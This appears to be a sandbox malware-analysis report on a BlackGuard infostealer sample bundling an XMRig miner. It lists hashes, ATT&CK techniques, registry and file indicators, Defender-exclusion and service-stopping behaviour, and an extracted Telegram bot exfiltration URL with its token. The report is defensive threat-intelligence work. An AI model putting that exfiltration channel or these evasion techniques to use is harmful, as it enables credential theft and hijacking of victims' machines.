blackguard | 9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-01-2025 10:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
Size

39.9MB
MD5

796310542e9fb2886de3f8cbdf88c9fa
SHA1

01dc8e64ff23db2f177e3d999c12329bfcd206d3
SHA256

9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193
SHA512

73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966
SSDEEP

786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg

Score

10^/10

blackguard xmrig discovery evasion execution miner persistence privilege_escalation spyware stealer upx

Malware Config

Extracted

Family

blackguard

https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021

Signatures

BlackGuard
Infostealer first seen in Late 2021.
stealer blackguard
Blackguard family
blackguard

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 4492 created 3404	4492	3.exe	56
PID 4492 created 3404	4492	3.exe	56
PID 4492 created 3404	4492	3.exe	56
PID 4492 created 3404	4492	3.exe	56
PID 4492 created 3404	4492	3.exe	56
PID 2416 created 3404	2416	updater.exe	56
PID 2416 created 3404	2416	updater.exe	56
PID 2416 created 3404	2416	updater.exe	56
PID 2416 created 3404	2416	updater.exe	56
PID 2416 created 3404	2416	updater.exe	56
PID 2416 created 3404	2416	updater.exe	56
PID 3636 created 3404	3636	conhost.exe	56
PID 2416 created 3404	2416	updater.exe	56

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral2/memory/2380-482-0x00007FF7C9790000-0x00007FF7C9F84000-memory.dmp	xmrig
behavioral2/memory/2380-491-0x00007FF7C9790000-0x00007FF7C9F84000-memory.dmp	xmrig
behavioral2/memory/2380-1360-0x00007FF7C9790000-0x00007FF7C9F84000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5116	powershell.exe
884	powershell.exe
4720	powershell.exe
1088	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	VegaStealer_v2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	CheatEngine75.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	UIHost.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 31 IoCs

pid	Process
4492	3.exe
4684	VegaStealer_v2.exe
4916	CheatEngine75.exe
4660	v2.exe
3440	CheatEngine75.tmp
2416	updater.exe
1372	saBSI.exe
4400	OperaSetup.exe
4176	setup.exe
3400	setup.exe
32	setup.exe
3880	WZSetup.exe
3584	setup.exe
3100	setup.exe
3216	CheatEngine75.exe
2456	CheatEngine75.tmp
924	_setup64.tmp
4536	Kernelmoduleunloader.exe
1884	WeatherZeroService.exe
4884	WeatherZeroService.exe
2848	windowsrepair.exe
3148	WeatherZeroService.exe
4208	installer.exe
4908	installer.exe
5660	ServiceHost.exe
728	UIHost.exe
5224	Assistant_114.0.5282.21_Setup.exe_sfx.exe
2208	assistant_installer.exe
1668	assistant_installer.exe
4196	updater.exe
4332	WeatherZero.exe

Loads dropped DLL 43 IoCs

pid	Process
4660	v2.exe
4660	v2.exe
4660	v2.exe
4660	v2.exe
4660	v2.exe
3440	CheatEngine75.tmp
4176	setup.exe
3400	setup.exe
32	setup.exe
3880	WZSetup.exe
3584	setup.exe
3100	setup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
4908	installer.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
3880	WZSetup.exe
5660	ServiceHost.exe
5660	ServiceHost.exe
5660	ServiceHost.exe
5660	ServiceHost.exe
728	UIHost.exe
728	UIHost.exe
2208	assistant_installer.exe
2208	assistant_installer.exe
1668	assistant_installer.exe
1668	assistant_installer.exe
4332	WeatherZero.exe
4332	WeatherZero.exe
4332	WeatherZero.exe
4332	WeatherZero.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3964	icacls.exe
2680	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File created	C:\Windows\assembly\Desktop.ini	WeatherZero.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	WeatherZero.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	setup.exe
File opened (read-only)	\??\F:	setup.exe
File opened (read-only)	\??\D:	setup.exe
File opened (read-only)	\??\F:	setup.exe

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	freegeoip.app
7	freegeoip.app
19	ip-api.com
103	ip-api.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3868	cmd.exe
4448	powercfg.exe
3424	powercfg.exe
5020	cmd.exe
3216	powercfg.exe
4936	powercfg.exe
876	powercfg.exe
2540	powercfg.exe
2256	powercfg.exe
3008	powercfg.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2416 set thread context of 3636	2416	updater.exe	139
PID 2416 set thread context of 2380	2416	updater.exe	145

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2380-362-0x00007FF7C9790000-0x00007FF7C9F84000-memory.dmp	upx
behavioral2/memory/2380-482-0x00007FF7C9790000-0x00007FF7C9F84000-memory.dmp	upx
behavioral2/memory/2380-491-0x00007FF7C9790000-0x00007FF7C9F84000-memory.dmp	upx
behavioral2/memory/2380-1360-0x00007FF7C9790000-0x00007FF7C9F84000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-dialog-balloon-tr-TR.js	installer.exe
File created	C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\events.json	ServiceHost.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\autorun\dlls\MonoDataCollector32.dll	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\is-EJ6NO.tmp	CheatEngine75.tmp
File created	C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\context\wpssubscriptionstatus.luc	installer.exe
File created	C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\json2.js	ServiceHost.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\clibs32\lfs.dll	CheatEngine75.tmp
File created	C:\Program Files\McAfee\Temp3727718660\mfw-mwb.cab	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-hu-HU.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-upsell-toast-zh-CN.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-score-toast-fr-FR.js	installer.exe
File created	C:\Program Files\McAfee\Temp3727718660\jslang\wa-res-install-es-MX.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\builtin\open_sideloaded_ext_alert_guide.png	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\new-tab-res-toast-nb-NO.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-ss-toast-variants-sv-SE.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\uihost.exe	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\new-tab-res-toast-ru-RU.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-oem-ss-toast-variants-fr-CA.js	installer.exe
File created	C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\dataset_da.js	ServiceHost.exe
File created	C:\Program Files (x86)\WeatherZero\Newtonsoft.Json.dll	WZSetup.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\new-tab-res-toast-hr-HR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-ss-toast-variants.html	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\events\searchsuggestcounter.luc	installer.exe
File created	C:\Program Files\McAfee\Temp3727718660\jslang\wa-res-shared-en-US.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\builtin\wa-ui-dialog.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\twitter.png	installer.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\tcc64-64.dll	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\clibs64\lfs.dll	CheatEngine75.tmp
File created	C:\Program Files\McAfee\Temp3727718660\taskmanager.cab	installer.exe
File created	C:\Program Files\McAfee\Temp3727718660\wa_install_close.png	installer.exe
File created	C:\Program Files\McAfee\Temp3727718660\jslang\eula-sk-SK.txt	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-pps-pt-PT.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-fr-FR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\events\wssanalyticsraw.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-ja-JP.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-ko-KR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\context\subscriptionexpirydate.luc	installer.exe
File created	C:\Program Files\Cheat Engine 7.5\autorun\images\is-B7R7R.tmp	CheatEngine75.tmp
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-checklist-fr-CA.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-upsell-toast-danger.png	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-da-DK.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-zh-CN.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-ss-toast-variants-tr-TR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-adblock-nb-NO.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\logicmodule.dll	installer.exe
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\is-MOMI7.tmp	CheatEngine75.tmp
File created	C:\Program Files\McAfee\Temp3727718660\uninstaller.cab	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-options-cs-CZ.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-en-US.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-fr-FR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-overlay-zh-TW.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-pl-PL.js	installer.exe
File created	C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\transport_event_hub.js	ServiceHost.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\ced3d9hook64.dll	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Mono\MonoDataCollector\is-LOO0A.tmp	CheatEngine75.tmp
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-controller-checklist.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-ext-install-toast.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-oem-ss-toast-variants-sk-SK.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\uimanager.dll	installer.exe
File opened for modification	C:\Program Files\McAfee\Webadvisor\Analytics\dataset_da.js	ServiceHost.exe
File created	C:\Program Files\Cheat Engine 7.5\include\winapi\is-NJMLM.tmp	CheatEngine75.tmp
File created	C:\Program Files\McAfee\Temp3727718660\jslang\wa-res-install-nl-NL.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\logic\smart_toasting\smart_toast_config_manager.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-overlay-hu-HU.js	installer.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\assembly	WeatherZero.exe
File created	C:\Windows\assembly\Desktop.ini	WeatherZero.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	WeatherZero.exe

Launches sc.exe 12 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1568	sc.exe
212	sc.exe
4160	sc.exe
4208	sc.exe
2304	sc.exe
1712	sc.exe
1712	sc.exe
4812	sc.exe
1564	sc.exe
3680	sc.exe
1816	sc.exe
4960	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	assistant_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeatherZero.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VegaStealer_v2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeatherZeroService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	saBSI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Kernelmoduleunloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeatherZeroService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeatherZeroService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Assistant_114.0.5282.21_Setup.exe_sfx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	assistant_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OperaSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral2/files/0x0007000000023d12-470.dat	nsis_installer_1
behavioral2/files/0x0007000000023d12-470.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	v2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	v2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CheatEngine75.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\	CheatEngine75.tmp

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1380	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	ServiceHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe

Modifies registry class 22 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\shell\open	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.CETRAINER	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.CT	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\ = "Cheat Engine"	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\DefaultIcon\ = "C:\\Program Files\\Cheat Engine 7.5\\Cheat Engine.exe,0"	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.CETRAINER\ = "CheatEngine"	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.CT\ = "CheatEngine"	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\DefaultIcon	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\shell\open\command	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\ = "McAfee SiteAdvisor MISP Integration"	installer.exe
